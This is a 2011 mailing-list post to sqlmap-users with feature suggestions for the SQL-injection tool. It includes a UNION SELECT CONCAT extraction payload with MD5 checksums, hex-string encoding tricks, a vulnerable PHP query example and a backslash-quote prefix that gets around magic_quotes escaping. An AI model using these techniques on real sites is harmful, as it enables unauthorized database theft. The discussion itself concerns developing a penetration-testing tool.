Hello, Miroslav!

On Ср., 2011-08-10 at 10:48 +0200, Miroslav Stampar wrote:
> Hi Vladimir.
> 
> Thank you for your report. We'll so something about it. In the mean
> time you can experiment with --technique (other than U) or
> --start/--stop.
> 
> If there is no alternative please contact me privately and i'll make
> you a temporary patch.
> 
> That idea with end char is great. We'll try to use it in detection
> phase.
> 
> Kr
> 
> On 9.8.2011. 22:34, "Vladimir Rutsky" <rutsky.vladi...@gmail.com>
> wrote:
> 

Thank you for fast reply! I managed to get required information without
using of sqlmap, so temporary patch is not needed, let my letter will be
feature request for future versions of sqlmap.

I my case using --start/--stop helped a little --- when I provide such
options looks like sqlmap obtains requested rows one by one, so limit in
PHP script for 10 items per page is never reached. But anyway sqlmap
incorrectly obtains not more than 10 columns from table, so I can't get
full table dump with it.

Below I consider that we using UNION-SELECT-technique.

1. How about along with each obtained item from database through
sql-injection also pass checksum for that value. UNION-SELECT-technique
SQL-injection by it's nature gives ability to obtain values from
database as text --- because HTTP transfers text, so you can apply any
checksum to that text. 

I suggest to request value through sql-injection as follows (for MySQL):
  UNION SELECT 
    CONCAT(
      "start tag", 
      CAST(xxx AS CHAR), 
      MD5(CAST(xxx AS CHAR)), 
      "end tag")

Then if obtained result contains text with valid checksum between start
and end tags, then output is definitely not corrupted or truncated.

2. I saw that in MySQL queries you use a lot of
"CONCAT(CHAR(58,46,121,118,58), ..." constructions. You can reduce their
length by using hexadecimal presentations of strings in MySQL, like
"CONCAT(0x3a2e79763a, ...".

3. I looked through xml/payloads.xml and didn't find prefixes for simple
WHERE clause inclusions on PHP-powered host with enabled
magic_quotes_gpc [1]. Consider example (PHP and MySQL):

mysql_query("SELECT a,b,c FROM table WHERE name='" . $_GET["id"] . "'");

When single quote is passed through GET it's being escaped: "'" -> "\'".
To workaround such escaping is enough to use "\'" prefix in sqlmap: "\'"
-> "\\'".
I suggest to use "\'" prefixes in sqlmap along with "'" prefixes.

[1] http://php.net/manual/en/security.magicquotes.php 

4. I tried to get familiar with source code of sqlmap, but despite it is
written in Python it is quite hard to read and understand without
learning main idea and methods that are used in sqlmap. Is there any
developer documentation?

Doing SQL-injection is an art in some sense. So sqlmap will never be
able to automatically hack every vulnerable site (but will help in most
of them). I think sqlmap should provide extendable and easy to use
library, divided on several independent modules, like module for testing
url for vulnerabilities, module for fetching data from foreign database
when "vector" for obtaining single item from database is found, and so
on.

P.S. I'm new to sqlmap and probably some of my thoughts described below
don't make sense in context of this project, or some of my ideas are
already implemented. Hope this letter will be useful. 


Best wishes,

Vladimir Rutsky



------------------------------------------------------------------------------
Get a FREE DOWNLOAD! and learn more about uberSVN rich system, 
user administration capabilities and model configuration. Take 
the hassle out of deploying and managing Subversion and the 
tools developers use with it. 
http://p.sf.net/sfu/wandisco-dev2dev
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to